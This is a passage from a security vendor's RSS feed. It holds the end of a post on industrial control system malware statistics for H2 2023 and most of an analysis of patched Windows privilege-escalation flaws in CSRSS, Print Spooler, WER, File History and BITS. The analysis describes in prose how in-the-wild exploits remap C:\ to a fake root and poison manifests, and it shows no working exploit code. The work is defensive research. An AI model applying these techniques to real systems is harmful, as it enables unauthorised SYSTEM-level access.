  1488. <category><![CDATA[Industrial control systems]]></category>
  1489. <category><![CDATA[Malware Statistics]]></category>
  1490. <category><![CDATA[Miner]]></category>
  1491. <category><![CDATA[Phishing]]></category>
  1492. <category><![CDATA[Ransomware]]></category>
  1493. <category><![CDATA[Spyware]]></category>
  1494. <category><![CDATA[Trojan]]></category>
  1495. <category><![CDATA[Worm]]></category>
  1496. <category><![CDATA[Industrial threats]]></category>
  1497. <guid isPermaLink="false"></guid>
  1499. <description><![CDATA[Kaspersky ICS CERT shares industrial threat statistics for H2 2023: most commonly detected malicious objects, threat sources, threat landscape by industry and region.]]></description>
  1500. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="global-statistics-across-all-threats">Global statistics across all threats</h2>
  1501. <p>In the second half of 2023, the percentage of ICS computers on which malicious objects were blocked decreased by 2.1 pp to 31.9%.</p>
  1502. <div id="attachment_112192" style="width: 991px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112192" class="size-full wp-image-112192" src="" alt="Percentage of ICS computers on which malicious objects were blocked, by half year" width="981" height="392" srcset=" 981w, 300w, 768w, 876w, 740w, 701w, 800w" sizes="(max-width: 981px) 100vw, 981px" /></a><p id="caption-attachment-112192" class="wp-caption-text">Percentage of ICS computers on which malicious objects were blocked, by half year</p></div>
  1503. <h2 id="selected-industries">Selected industries</h2>
  1504. <p>In H2 2023, building automation once again had the highest percentage of ICS computers on which malicious objects were blocked of all industries that we looked at. Oil and Gas was the only industry to see a slight (0.5 pp) increase in the second half of the year.</p>
  1505. <div id="attachment_112193" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112193" class="size-large wp-image-112193" src="" alt="Percentage of ICS computers on which malicious objects were blocked in selected industries" width="1024" height="432" srcset=" 1024w, 300w, 768w, 830w, 740w, 664w, 800w, 1048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112193" class="wp-caption-text">Percentage of ICS computers on which malicious objects were blocked in selected industries</p></div>
  1506. <h2 id="main-threat-sources">Main threat sources</h2>
  1507. <p>The internet, email clients and removable media remained the main sources of threats to computers connected to enterprise OT networks. In the second half of 2023, the percentage of ICS computers on which malicious objects were blocked dropped for each of the main sources.</p>
  1508. <div id="attachment_112194" style="width: 1020px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112194" class="size-full wp-image-112194" src="" alt="Percentage of ICS computers on which malicious objects from various sources were blocked" width="1010" height="388" srcset=" 1010w, 300w, 768w, 911w, 740w, 729w, 800w" sizes="(max-width: 1010px) 100vw, 1010px" /></a><p id="caption-attachment-112194" class="wp-caption-text">Percentage of ICS computers on which malicious objects from various sources were blocked</p></div>
  1509. <h2 id="malicious-object-categories">Malicious object categories</h2>
  1510. <p>Malicious objects blocked by Kaspersky products on ICS computers belonged to many categories. In H2 2023, only one category saw an increase on the first half of the year: ICS computers on which miner executable files for Windows were blocked, by 1.4 times.</p>
  1511. <div id="attachment_112195" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112195" class="size-large wp-image-112195" src="" alt="Percentage of ICS computers on which the activity of various categories of malicious objects was prevented" width="1024" height="377" srcset=" 1024w, 300w, 768w, 952w, 740w, 761w, 800w, 1452w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112195" class="wp-caption-text">Percentage of ICS computers on which the activity of various categories of malicious objects was prevented</p></div>
  1512. <h2 id="regions">Regions</h2>
  1513. <p>In H2 2023, the percentage of computers on which malicious activity was prevented varied across regions from 38.2% in Africa to 14.8% in Northern Europe. The percentage increased in South Asia, Eastern Europe and Southern Europe.</p>
  1514. <div id="attachment_112196" style="width: 1031px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112196" class="size-full wp-image-112196" src="" alt="Regions ranked by percentage of ICS computers on which malicious objects were blocked, H2 2023" width="1021" height="581" srcset=" 1021w, 300w, 768w, 615w, 740w, 492w, 800w" sizes="(max-width: 1021px) 100vw, 1021px" /></a><p id="caption-attachment-112196" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious objects were blocked, H2 2023</p></div>
  1515. <h3 id="africa">Africa</h3>
  1516. <p><strong>Africa leads the region rankings</strong></p>
  1517. <ul>
  1518. <li>By percentage of ICS computers where malicious objects were blocked (all threats).</li>
  1519. <li>By percentage of ICS computers on which <strong>spyware</strong> was blocked.
  1520. <div id="attachment_112197" style="width: 1033px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112197" class="size-full wp-image-112197" src="" alt="Regions ranked by percentage of ICS computers on which spyware was blocked, H2 2023" width="1023" height="593" srcset=" 1023w, 300w, 768w, 604w, 740w, 483w, 800w" sizes="(max-width: 1023px) 100vw, 1023px" /></a><p id="caption-attachment-112197" class="wp-caption-text">Regions ranked by percentage of ICS computers on which spyware was blocked, H2 2023</p></div></li>
  1521. <li>By percentage of ICS computers on which <strong>worms</strong> were blocked.
  1522. <div id="attachment_112198" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112198" class="size-full wp-image-112198" src="" alt="Regions ranked by percentage of ICS computers on which worms were blocked, H2 2023" width="1016" height="595" srcset=" 1016w, 300w, 768w, 598w, 740w, 478w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112198" class="wp-caption-text">Regions ranked by percentage of ICS computers on which worms were blocked, H2 2023</p></div></li>
  1523. <li>By percentage of ICS computers on which <strong>web miners</strong> were blocked.
  1524. <div id="attachment_112199" style="width: 1031px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112199" class="size-full wp-image-112199" src="" alt="Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023" width="1021" height="595" srcset=" 1021w, 300w, 768w, 601w, 740w, 480w, 800w" sizes="(max-width: 1021px) 100vw, 1021px" /></a><p id="caption-attachment-112199" class="wp-caption-text">Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023</p></div></li>
  1525. <li>By percentage of ICS computers on which <strong>removable media</strong> threats were blocked
  1526. <div id="attachment_112200" style="width: 1023px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112200" class="size-full wp-image-112200" src="" alt="Regions ranked by percentage of ICS computers on which removable media threats were blocked, H2 2023" width="1013" height="616" srcset=" 1013w, 300w, 768w, 330w, 576w, 740w, 460w, 800w" sizes="(max-width: 1013px) 100vw, 1013px" /></a><p id="caption-attachment-112200" class="wp-caption-text">Regions ranked by percentage of ICS computers on which removable media threats were blocked, H2 2023</p></div></li>
  1527. </ul>
  1528. <h3 id="southern-europe">Southern Europe</h3>
  1529. <ul>
  1530. <li><strong>Leads</strong> the regions by percentage of ICS computers on which email threats (<strong>malicious email attachments and phishing links)</strong> were blocked.
  1531. <div id="attachment_112201" style="width: 1031px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112201" class="size-full wp-image-112201" src="" alt="Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023" width="1021" height="615" srcset=" 1021w, 300w, 768w, 330w, 581w, 740w, 465w, 800w" sizes="(max-width: 1021px) 100vw, 1021px" /></a><p id="caption-attachment-112201" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023</p></div></li>
  1532. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>malicious documents</strong> were blocked.</li>
  1533. <li>One of the two regions where the percentage of ICS computers on which <strong>spyware</strong> was blocked rose in the six-month period.</li>
  1534. </ul>
  1535. <h3 id="eastern-europe">Eastern Europe</h3>
  1536. <ul>
  1537. <li>Saw the largest, among all regions, <strong>increase in the percentage</strong> of ICS computers on which malicious objects were blocked in H2 2023: <strong>6 pp.</strong></li>
  1538. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>malicious scripts and phishing pages were blocked</strong>.</li>
  1539. <li>In the six-month period, the <strong>region saw a rise in the percentage</strong> of ICS computers on which the following were blocked:
  1540. <ul>
  1541. <li><strong>Malicious scripts and phishing pages: </strong>by 2.9 pp</li>
  1542. <li><strong>Miner executable files for Windows: </strong>by 0.9 pp</li>
  1543. <li><strong>Worms</strong>: by 0.43 pp (the only region where this percentage rose)</li>
  1544. <li><strong>Denylisted internet resources</strong>: by 0.4 pp (the only region where this percentage rose).</li>
  1545. </ul>
  1546. </li>
  1547. </ul>
  1548. <h3 id="russia">Russia</h3>
  1549. <ul>
  1550. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>miners in the form of executable files for Windows</strong> were blocked.</li>
  1551. </ul>
  1552. <h3 id="central-asia">Central Asia</h3>
  1553. <ul>
  1554. <li><strong>Leads</strong> the regions by percentage of ICS computers on which <strong>denylisted internet resources</strong> were blocked.
  1555. <div id="attachment_112202" style="width: 1021px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112202" class="size-full wp-image-112202" src="" alt="Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023" width="1011" height="606" srcset=" 1011w, 300w, 768w, 584w, 740w, 467w, 800w" sizes="(max-width: 1011px) 100vw, 1011px" /></a><p id="caption-attachment-112202" class="wp-caption-text">Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023</p></div></li>
  1556. <li><strong>Leads</strong> by percentage of ICS computers on which <strong>miners in the form of executable files for Windows</strong> were blocked.
  1557. <div id="attachment_112203" style="width: 1033px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112203" class="size-full wp-image-112203" src="" alt="Regions ranked by percentage of ICS computers on which miners in the form of executable files for Windows were blocked, H2 2023" width="1023" height="626" srcset=" 1023w, 300w, 768w, 572w, 740w, 458w, 800w" sizes="(max-width: 1023px) 100vw, 1023px" /></a><p id="caption-attachment-112203" class="wp-caption-text">Regions ranked by percentage of ICS computers on which miners in the form of executable files for Windows were blocked, H2 2023</p></div></li>
  1558. <li><strong>Second among the regions</strong> by percentage of ICS computers on which <strong>worms</strong> were blocked.</li>
  1559. </ul>
  1560. <h3 id="east-asia">East Asia</h3>
  1561. <ul>
  1562. <li><strong>Leads</strong> the regions by percentage of ICS computers on which <strong>malware for AutoCAD</strong> was blocked.</li>
  1563. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>viruses</strong> were blocked.</li>
  1564. <li><strong>Spyware ranked second in the region</strong> among all malware categories by percentage of ICS computers on which it was blocked.</li>
  1565. </ul>
  1566. <h3 id="south-east-asia">South-East Asia</h3>
  1567. <ul>
  1568. <li><strong>Leader</strong> among the regions by percentage of ICS computers on which <strong>viruses</strong> were blocked.
  1569. <div id="attachment_112204" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112204" class="size-full wp-image-112204" src="" alt="Regions ranked by percentage of ICS computers on which viruses were blocked, H2 2023" width="1016" height="594" srcset=" 1016w, 300w, 768w, 599w, 740w, 479w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112204" class="wp-caption-text">Regions ranked by percentage of ICS computers on which viruses were blocked, H2 2023</p></div></li>
  1570. <li><strong>Viruses ranked third in the region </strong>among all malware categories by percentage of ICS computers on which they were blocked.</li>
  1571. </ul>
  1572. <h3 id="south-asia">South Asia</h3>
  1573. <ul>
  1574. <li><strong>Leader</strong> (along with the Middle East) among the regions by percentage of ICS computers on which <strong>ransomware</strong> was blocked.
  1575. <div id="attachment_112205" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112205" class="size-full wp-image-112205" src="" alt="Regions ranked by percentage of ICS computers on which ransomware was blocked, H2 2023" width="1016" height="599" srcset=" 1016w, 300w, 768w, 594w, 740w, 475w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112205" class="wp-caption-text">Regions ranked by percentage of ICS computers on which ransomware was blocked, H2 2023</p></div></li>
  1576. </ul>
  1577. <h3 id="middle-east">Middle East</h3>
  1578. <ul>
  1579. <li><strong>Leads</strong> (together with South Asia) the regions by percentage of ICS computers on which <strong>ransomware</strong> was blocked.</li>
  1580. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>spyware</strong> was blocked.</li>
  1581. <li><strong>Second</strong> among the regions by percentage of ICS computers on which <strong>web miners</strong> were blocked.</li>
  1582. </ul>
  1583. <h3 id="latin-america">Latin America</h3>
  1584. <ul>
  1585. <li><strong>Leads</strong> the regions by percentage of ICS computers on which <strong>malicious scripts and phishing pages</strong> were blocked.
  1586. <div id="attachment_112206" style="width: 1027px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112206" class="size-full wp-image-112206" src="" alt="Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023" width="1017" height="621" srcset=" 1017w, 300w, 768w, 573w, 740w, 459w, 800w" sizes="(max-width: 1017px) 100vw, 1017px" /></a><p id="caption-attachment-112206" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023</p></div></li>
  1587. <li><strong>Leader</strong> by percentage of ICS computers on which <strong>malicious documents</strong> were blocked.
  1588. <div id="attachment_112207" style="width: 1024px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112207" class="size-full wp-image-112207" src="" alt="Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023" width="1014" height="591" srcset=" 1014w, 300w, 768w, 601w, 740w, 480w, 800w" sizes="(max-width: 1014px) 100vw, 1014px" /></a><p id="caption-attachment-112207" class="wp-caption-text">Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023</p></div></li>
  1589. <li>Second<strong> among the regions by percentage of ICS computers on which </strong>malicious email attachments and phishing links<strong> were blocked.</strong></li>
  1590. </ul>
  1591. <h3 id="australia-and-new-zealand">Australia and New Zealand</h3>
  1592. <ul>
  1593. <li>The only region where the percentage of ICS computers on which <strong>malicious documents</strong> were blocked rose in the six-month period.</li>
  1594. </ul>
  1595. <p>The full report <a href=";utm_medium=link&amp;utm_campaign=threat-landscape-for-industrial-automation-systems-statistics-for-h2-2023" target="_blank" rel="noopener">is available</a> on the Kaspersky ICS CERT website.</p>
  1596. ]]></content:encoded>
  1597. <wfw:commentRss></wfw:commentRss>
  1598. <slash:comments>0</slash:comments>
  1599. <media:content xmlns:media="" url="" width="1200" height="800"><media:keywords>full</media:keywords></media:content>
  1600. <media:content xmlns:media="" url="" width="1024" height="683"><media:keywords>large</media:keywords></media:content>
  1601. <media:content xmlns:media="" url="" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
  1602. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1603. </item>
  1604. <item>
  1605. <title>A patched Windows attack surface is still exploitable</title>
  1606. <link></link>
  1607. <comments></comments>
  1608. <dc:creator><![CDATA[Elsayed Elrefaei, Ashraf Refaat, Kaspersky GERT]]></dc:creator>
  1609. <pubDate>Thu, 14 Mar 2024 10:00:24 +0000</pubDate>
  1610. <category><![CDATA[SOC, TI and IR posts]]></category>
  1611. <category><![CDATA[Microsoft Windows]]></category>
  1612. <category><![CDATA[Vulnerabilities]]></category>
  1613. <category><![CDATA[Vulnerabilities and exploits]]></category>
  1614. <category><![CDATA[Vulnerabilities and exploits]]></category>
  1615. <guid isPermaLink="false"></guid>
  1617. <description><![CDATA[In this report, we highlight the key points about a class of recently-patched elevation-of-privilege vulnerabilities affecting Microsoft Windows, and then focus on how to check if any of them have been exploited or if there have been any attempts to exploit them.]]></description>
  1618. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>On August 8, 2023, Microsoft finally <a href="" target="_blank" rel="noopener">released</a> a kernel patch for a class of vulnerabilities affecting Microsoft Windows since <a href="" target="_blank" rel="noopener">2015</a>. The vulnerabilities lead to elevation of privilege (EoP), which allows an account with user rights to gain SYSTEM privileges on a vulnerable host. The root cause of this attack surface, according to a <a href="" target="_blank" rel="noopener">2015</a> blog, is the ability of a normal user account to replace the original C:\ drive with a fake one by placing a symlink for the system drives in the device map for each login session. This fake drive will be followed by the kernel during impersonation instead of the original system drive. More than five months after the patches for these vulnerabilities were released, we&#8217;re still seeing some of their exploits in the wild because it&#8217;s a very easy way to get a quick <strong>NT AUTHORITY\SYSTEM</strong> and that&#8217;s why it may be favored by well-known threat actors.</p>
  1619. <p>We discussed these findings at the BlackHat MEA conference in November 2023, and in December 2023 and January 2024, we found two exploits that could still use this attack surface in the unpatched version of Windows. Both exploits are packed in UPX. After analyzing the first one, we saw that it was a packed version of a Google Project Zero <a href="" target="_blank" rel="noopener">PoC sample</a>. The other sample was a packed version of an <a href="" target="_blank" rel="noopener">SSD Secure Disclosure</a> public PoC, even using the same NamedPipe <strong>&#8220;\\\\.\\Pipe\\TyphoonPWN&#8221; </strong>without modifications. The PDB paths for both samples are:</p>
  1620. <ul>
  1621. <li>C:\Users\Administrator\source\repos\exp\x64\Release\exp.pdb</li>
  1622. <li>C:\VVS-Rro\CVEs\spool\BitsPoc\src\x64\Release\PoC_BITs.pdb</li>
  1623. </ul>
  1624. <p>Below we will highlight the key points and then focus on how to check if any of the vulnerabilities have been exploited or if there have been any attempts to exploit them, and enumerate popular CVEs included in this vulnerable surface.</p>
  1625. <p>Affected processes and services include native Windows services that run by default on most versions of the operating system. These include:</p>
  1626. <ul>
  1627. <li>CSRSS</li>
  1628. <li>Windows Error Reporting (WER)</li>
  1629. <li>File history service</li>
  1630. <li>Background intelligence transfer service (BITS)</li>
  1631. <li>Print Spooler</li>
  1632. </ul>
  1633. <div id="attachment_112246" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112246" class="size-large wp-image-112246" src="" alt="Vulnerable Windows processes and services" width="1024" height="401" srcset=" 1024w, 300w, 768w, 1536w, 893w, 740w, 714w, 800w, 1946w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112246" class="wp-caption-text">Vulnerable Windows processes and services</p></div>
  1634. <p>The exploits affecting this attack surface share a common logic or pattern, including:</p>
  1635. <ul>
  1636. <li>Searching for a DLL that runs with system integrity.</li>
  1637. <li>The DLL has an isolation-aware manifest file.</li>
  1638. <li>The ability to change the C:\ root to a writable directory via symlinks.</li>
  1639. </ul>
  1640. <h2 id="csrss-cve-2022-22047">CSRSS | CVE-2022-22047</h2>
  1641. <p>This Activation Context Cache Poisoning vulnerability leads to local privilege escalation. It&#8217;s one of the CVEs that was actively exploited by a threat actor called <a href="" target="_blank" rel="noopener">KNOTWEED | Denim Tsunami</a>.</p>
  1642. <p>Reversing the in-the-wild exploit for the CVE-2022-22047 shows:</p>
  1643. <ul>
  1644. <li>The exploit crafts a call into CSRSS.</li>
  1645. <li>The call requests an activation context for a privileged executable and specifies a malicious manifest.<br />
  1646. <a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112247" src="" alt="" width="1024" height="570" srcset=" 1024w, 300w, 768w, 270w, 629w, 740w, 503w, 800w, 1146w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></li>
  1647. <li>The manifest uses an undocumented manifest XML attribute named <strong>loadFrom</strong>. This attribute allows unrestricted redirection of DLLs to any location on a disk, including locations outside of the normal search path, without even having to change the C:\ root drive.<br />
  1648. <a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112248" src="" alt="" width="717" height="420" srcset=" 717w, 300w, 598w, 478w" sizes="(max-width: 717px) 100vw, 717px" /></a></li>
  1649. </ul>
  1650. <p>Here is <a href="" target="_blank" rel="noopener">a detailed blog post</a> by ZDI explaining CSRSS Cache Poisoning.</p>
  1651. <h2 id="csrss-cve-2022-37989">CSRSS | CVE-2022-37989</h2>
  1652. <p>The second vulnerability, involving CSRSS Cache Poisoning, was a workaround for the first CVE-2022-22047. After patching the undocumented &#8220;LoadFrom&#8221; attribute, there was another attribute that could be abused to load a manifest file from a user-controlled path by declaring a dependent assembly using path traversal in the <strong>name</strong> attribute.</p>
  1653. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112249" src="" alt="" width="1024" height="503" srcset=" 1024w, 300w, 768w, 713w, 740w, 570w, 800w, 1143w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1654. <p>The patch for the CVE-2022-37989 was simple: check if the <strong>name</strong> attribute of the dependency contains any forward or backward slashes, and set a flag to stop caching this suspicious manifest if name path traversal is detected. This CVE <a href="" target="_blank" rel="noopener">was discovered</a> by ZDI.</p>
  1655. <h2 id="print-spooler-cve-2022-29104">Print Spooler | CVE-2022-29104</h2>
  1656. <p>Print Spooler is a service that runs by default in almost all versions of Windows. It&#8217;s responsible for managing paper print jobs sent from a computer to a printer or print server. Reversing in-the-wild exploits of the CVE-2022-29104 Print Spooler vulnerability shows that it&#8217;s a .NET sample that creates a symbolic link from C:\ to the fake root C:\Imprint. The sample was uploaded to <a href="" target="_blank" rel="noopener">VirusTotal</a>.</p>
  1657. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112250" src="" alt="" width="1024" height="218" srcset=" 1024w, 300w, 768w, 1536w, 740w, 1312w, 800w, 1589w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1658. <p>Fake C:\ drive structure:</p>
  1659. <ul>
  1660. <li>C:\<strong>Imprint</strong>\Windows\system32</li>
  1661. <li>C:\<strong>Imprint</strong>\Windows\WinSxS</li>
  1662. </ul>
  1663. <p>All folders inside the Imprint folder are writable, allowing an attacker to control their contents.</p>
  1664. <p>Path traversal is added to &#8220;AssemblyIdentity&#8221; to point to the Imprint writable path.</p>
  1665. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112251" src="" alt="" width="1024" height="286" srcset=" 1024w, 300w, 768w, 1251w, 740w, 1001w, 800w, 1423w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1666. <p>The vulnerability analysis shows that:</p>
  1667. <ul>
  1668. <li>An attacker can remap the root drive (C:\) for privileged processes during impersonation.</li>
  1669. <li>During impersonation, all file accesses are performed using the DOS device map of the impersonated process.</li>
  1670. <li>CSRSS uses a user-modified side-by-side manifest for generating the activation context instead of the manifest in the WinSxS folder <strong>C:\Windows\WinSxS.</strong></li>
  1671. <li>The WinSxS folder stores multiple copies of system files and components.</li>
  1672. <li>The WinSxS folder provides a central location for storing different versions of system files that are shared by multiple applications and processes.</li>
  1673. <li>The WinSxS folder provides system stability and compatibility by allowing different applications to use the specific versions of files they need.</li>
  1674. <li>WinSxS avoids DLL hell, a problem that occurs when different applications require different versions of the same DLL.</li>
  1675. </ul>
  1676. <p>The Windows operating system uses the application manifest to determine which version is appropriate for which app.</p>
  1677. <p>The application manifest is stored in XML format and describes:</p>
  1678. <ul>
  1679. <li>The dependencies associated with the application.</li>
  1680. <li>What permissions the application requires.</li>
  1681. <li>What compatibility settings the application supports.</li>
  1682. </ul>
  1683. <p>CSRSS mitigation was enabled for<strong> spoolsv.exe</strong> and <strong>printfilterpipelinesvc.exe </strong>to stop impersonation while loading external resources, and then to resume impersonation after the external resources are loaded.</p>
  1684. <h2 id="print-spooler-cve-2022-41073">Print Spooler | CVE-2022-41073</h2>
  1685. <p>After CVE-2022-29104 was patched, another vulnerability affecting Print Spooler was discovered – CVE-2022-41073. Reversing the in-the-wild exploit of this vulnerability shows some XML manipulation using path traversal to a writable path containing a modified version of <strong>prntvpt.dll </strong>that is loaded by Print Spooler.</p>
  1686. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112252" src="" alt="" width="1024" height="318" srcset=" 1024w, 300w, 768w, 1126w, 740w, 901w, 800w, 1399w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1687. <p>According to <a href="" target="_blank" rel="noopener">Project Zero</a>, mitigation was added to CSRSS, the patch simply stopped any impersonation prior to the <strong>LoadLibraryExW</strong> call in <strong>winspool!LoadNewCopy</strong>, and then resumed it.</p>
  1688. <p>After that the <strong>LoadLibraryExW</strong> call returned:</p><pre class="crayon-plain-tag">+ if (RevertToProcess(&amp;TokenHandle, x) &gt;= 0) {
  1689.  lib = LoadLibraryExW(arg1, 0, dwFlags);
  1690. +   ResumeImpersonation(TokenHandle);
  1691. + }</pre><p>
  1692. NtOpenFile is called with the <strong>OBJ_IGNORE_IMPERSONATED_DEVICEMAP</strong> flag. It will stop impersonation when loading any external resources while using the LoadNewCopy API. Stopping impersonation means that privileged processes will not use the fake root implemented with the medium integrity process, and instead it will use the original C:\ drive root to avoid loading untrusted or malicious resources.</p>
  1693. <h2 id="windows-error-reporting-cve-2023-36874">Windows Error Reporting | CVE-2023-36874</h2>
  1694. <p>Windows Error Reporting (WER) is a privileged service that analyzes and reports various software issues in Windows. The root cause for the exploitation of the CVE-2023-36874 vulnerability is CreateProcess API when a crash happens, because CreateProcess API can be tricked into following the fake root and creating the process from this writable fake root in the context of the privileged WER service, leading to privilege escalation.</p>
  1695. <p>CVE-2023-36874 was exploited in the wild and has several published <a href="" target="_blank" rel="noopener">PoCs</a>. The exploit interacts with the IWerReport COM interface and calls SubmitReport, then UtilLaunchWerManager is called, which calls CreateProcess. CreateProcess API is then vulnerable to DoS device modification.</p>
  1696. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112253" src="" alt="" width="889" height="74" srcset=" 889w, 300w, 768w, 740w, 800w" sizes="(max-width: 889px) 100vw, 889px" /></a></p>
  1697. <p>Once the exploit to submit a fake crash report is executed, it will end up calling the vulnerable CreateProcess API.</p>
  1698. <h2 id="file-history-service-cve-2023-35359">File History Service | CVE-2023-35359</h2>
  1699. <p>File History Service can be used to automatically back up personal folders and files such as documents, pictures and videos. Reversing the in-the-wild exploit shows that when File History Service starts, it impersonates the current user and then loads a DLL called<strong> fhcfg.dll</strong> under impersonation. This DLL has an &#8220;application aware manifest config&#8221; that attempts to load another resource called msasn1.dll. <a href="" target="_blank" rel="noopener">The exploit</a> starts with the usual technique of changing the C:\ root to a fake writable root.</p>
  1700. <p><a href="" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112254" src="" alt="" width="1024" height="511" srcset=" 1024w, 300w, 768w, 702w, 740w, 561w, 800w, 1193w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  1701. <h2>Windows Error Reporting – 2<sup>nd</sup> exploit | CVE-2023-35359</h2>
  1702. <p>After patching the first Windows Error Reporting vulnerability, which used the CreateProcess API inside the privileged WER service and follows the fake root to create a process. The patched WER service started using CreateProcessAsUser instead of  CreateProcess API. However, after that patch, adversaries found another way that could lead to the use of CreateProcess again under certain conditions, which was considered a new vulnerability. For example, if the WER service was marked as disabled on a system and there was a privileged process impersonating a medium-integrity user on that system, and an unhandled exception occurs during impersonation that results in a crash, that crash tries to enable the WER service for reporting. <a href="" target="_blank" rel="noopener">The detailed analysis for this CVE</a> shows that it does not appear to be exploitable.</p>
  1703. <div id="attachment_112255" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112255" class="size-large wp-image-112255" src="" alt="The exploitation of CVE-2023-35359" width="1024" height="578" srcset=" 1024w, 300w, 768w, 1536w, 620w, 740w, 496w, 800w, 1940w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112255" class="wp-caption-text">The exploitation of CVE-2023-35359</p></div>
  1704. <h2 id="bits-cve-2023-35359">BITS | CVE-2023-35359</h2>
  1705. <p>The Background Intelligence Transfer Service (BITS) is responsible for facilitating the asynchronous and prioritized transfer of files between a client and a server. BITS operates in the background, which means it can perform file transfers without interrupting a user or consuming all of the available network.</p>
  1706. <p>You may notice that the number CVE-2023-35359 has not changed for the last three CVEs because Microsoft decided in the last patch to assign the same CVE to all vulnerabilities of this type. So there are different vulnerabilities in different processes/services but with the same CVE number.</p>
  1707. <div id="attachment_112256" style="width: 961px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112256" class="size-full wp-image-112256" src="" alt="Timeline for the bypassing/patching process from 2015 to August 2023" width="951" height="929" srcset=" 951w, 300w, 768w, 358w, 740w, 287w, 800w, 50w" sizes="(max-width: 951px) 100vw, 951px" /></a><p id="caption-attachment-112256" class="wp-caption-text">Timeline for the bypassing/patching process from 2015 to August 2023</p></div>
  1708. <h2 id="how-was-the-patch-for-this-attack-surface-applied">How was the patch for this attack surface applied?</h2>
  1709. <p>The patch was applied to <strong>ObpLookupObjectName </strong>to check if the loaded resource is a file object and the call to <strong>ObpUseSystemDeviceMap</strong> succeeds. It then ignores the impersonation and uses SystemDevice.</p>
